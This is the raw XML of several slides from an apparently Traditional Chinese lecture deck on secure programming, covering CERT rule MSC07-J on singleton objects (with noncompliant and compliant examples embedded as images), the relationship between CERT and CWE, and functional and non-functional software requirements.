              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="39999" rotWithShape="0" dir="5400000" dist="20000">
              <a:srgbClr val="000000">
                <a:alpha val="37647"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>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90" name="Shape 490"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="491" name="Shape 491"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2134942" y="260647"/>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MSC07-J. Prevent multiple instantiations of singleton objects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Shape 492"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="493" name="Shape 493"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1055440" y="1412776"/>
            <a:ext cx="10858500" cy="796924"/>
            <a:chOff x="601472" y="170031"/>
            <a:chExt cx="8420607" cy="797039"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="494" name="Shape 494"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="601472" y="170031"/>
              <a:ext cx="8420607" cy="797039"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="022484"/>
            </a:solidFill>
            <a:ln cap="flat" cmpd="sng" w="25400">
              <a:solidFill>
                <a:schemeClr val="lt1"/>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495" name="Shape 495"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="640866" y="209725"/>
              <a:ext cx="8341818" cy="717653"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="022484"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="318275" rIns="318275" tIns="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buSzPct val="25000"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="zh-TW" sz="2800">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>Noncompliant  Code  Example</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="496" name="Shape 496"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457883" y="2636911"/>
            <a:ext cx="11224338" cy="2880320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="497" name="Shape 497"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="983432" y="2864941"/>
            <a:ext cx="10698790" cy="1428153"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="13725"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="BD4B48"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="39999" rotWithShape="0" dir="5400000" dist="20000">
              <a:srgbClr val="000000">
                <a:alpha val="37647"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>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01" name="Shape 501"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="502" name="Shape 502"/>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MSC07-J. Prevent multiple instantiations of singleton objects</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="Shape 503"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="504" name="Shape 504"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="983432" y="1412775"/>
            <a:ext cx="10858500" cy="685799"/>
            <a:chOff x="601472" y="170031"/>
            <a:chExt cx="8420607" cy="797039"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="505" name="Shape 505"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="601472" y="170031"/>
              <a:ext cx="8420607" cy="797039"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd fmla="val 16667" name="adj"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="022484"/>
            </a:solidFill>
            <a:ln cap="flat" cmpd="sng" w="25400">
              <a:solidFill>
                <a:schemeClr val="lt1"/>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506" name="Shape 506"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="640866" y="208777"/>
              <a:ext cx="8341818" cy="719549"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="022484"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchorCtr="0" anchor="ctr" bIns="0" lIns="318275" rIns="318275" tIns="0">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr indent="0" lvl="0" marL="0" marR="0" rtl="0" algn="l">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:buSzPct val="25000"/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr b="1" lang="zh-TW" sz="2800">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Arial"/>
                  <a:ea typeface="Arial"/>
                  <a:cs typeface="Arial"/>
                  <a:sym typeface="Arial"/>
                </a:rPr>
                <a:t>Compliant Solution</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="507" name="Shape 507"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="479375" y="2708919"/>
            <a:ext cx="11161240" cy="2816318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="508" name="Shape 508"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="964804" y="2996951"/>
            <a:ext cx="10826328" cy="1368151"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd fmla="val 16667" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="99CCFF">
              <a:alpha val="13725"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="none"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="39999" rotWithShape="0" dir="5400000" dist="20000">
              <a:srgbClr val="000000">
                <a:alpha val="37647"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>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Font typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="1" i="0" sz="1600" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>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13" name="Shape 513"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="514" name="Shape 514"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551385" y="1484315"/>
            <a:ext cx="11449271" cy="5041029"/>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CWE以及CERT的安全程式寫作標準彼此可以互補(mutually supportive roles)。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300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CWE提供完整的目前已知弱點資料庫，CERT則可以針對程式碼的安全性提供標準的最佳實務，以協助尋找暴露在程式中的弱點或漏洞。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300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並非所有在CWE中的弱點都實作在CERT的安全程式寫作標準中</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298431" lvl="1" marL="742932" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="56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因為不同的程式語言可能有不同的弱點</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-298431" lvl="1" marL="742932" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="56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此外CWE也提供高階設計的安全議題</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2400" u="none" cap="none" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS"/>
              <a:ea typeface="Trebuchet MS"/>
              <a:cs typeface="Trebuchet MS"/>
              <a:sym typeface="Trebuchet MS"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="515" name="Shape 515"/>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CERT與CWE的關係</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516" name="Shape 516"/>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20" name="Shape 520"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="521" name="Shape 521"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367433" cy="4611686"/>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安全議題應該含括在軟體開發生命週期的各個重要階段。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300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CWE資料庫可以完整提供目前已知的軟體安全弱點與漏洞，軟體開發的需求與設計階段可以參考這些常見的軟體安全弱點與漏洞來補強與提供解決的設計架構。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342891" lvl="0" marL="342891" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="300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CERT提供常見程式語言的安全程式寫作標準，藉由這樣的標準，可以提供程式設計師程式碼寫作的最佳參考實務，同時也可以做為檢驗程式碼的安全弱點與漏洞之驗證標準。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="522" name="Shape 522"/>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結語</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="523" name="Shape 523"/>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1" name="Shape 111"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Shape 112"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1201175" y="1412775"/>
            <a:ext cx="10367433" cy="4611686"/>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軟體工程是一種系統化開發軟體各種功能與需求的過程。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="555DAB"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Noto Sans Symbols"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2800"/>
              <a:t>功能性需求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marR="0" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="2800"/>
              <a:t>非功能性需求</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Shape 113"/>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軟體工程的安全議題</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Shape 114"/>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b="0" i="0" lang="zh-TW" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:ea typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:sym typeface="Tahoma"/>
              </a:rPr>
              <a:t>‹#›</a:t>
            </a:fld>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9" name="Shape 119"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Shape 120"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>使用者介面架構與行為模式</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>輸入項目</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>輸出項目</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>資料處理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>系統錯誤處理流程</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>系統啟動</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600" lvl="0" marL="457200">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>系統結束</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="121" name="Shape 121"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123018" y="260351"/>
            <a:ext cx="10068900" cy="827100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="27500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>功能性需求</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Shape 122"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="12" type="sldNum"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9028607" y="6212160"/>
            <a:ext cx="2540100" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="45700" lIns="91425" rIns="91425" tIns="45700">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="25000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="zh-TW"/>
              <a:t>‹#›</a:t>
            </a:fld>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="123" name="Shape 123"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1919475" y="5670000"/>
            <a:ext cx="10476000" cy="1308000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW"/>
              <a:t>https://winsys88.wordpress.com/2012/05/21/%E5%8A%9F%E8%83%BD%E6%80%A7%EF%BC%8F%E9%9D%9E%E5%8A%9F%E8%83%BD%E6%80%A7%E9%9C%80%E6%B1%82/</a:t>
            </a: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8" name="Shape 128"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Shape 129"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1200153" y="1484315"/>
            <a:ext cx="10367400" cy="4611600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" rIns="91425" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>設計的系統其能力</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>效能期望達到的要求</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>系統設計所使用的環境/工具</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>系統設計所需遵循的規範/標準、</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>運作環境(如：Window 2000, Linux ,…)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>安全性要求</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>(如：users 使用等級與限制 …)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>系統效能要求(如：Response Time &lt; 3 sec )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>可靠度的要求(如：Down Time &lt; 1/ Year )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>系統可攜性要求(如：可使用在 Window , PDA , Linux )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-342900" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-TW" sz="1800"/>
              <a:t>系統處理能力要求(如：Handle 1000 Concurrent users )</a:t>
            </a:r>
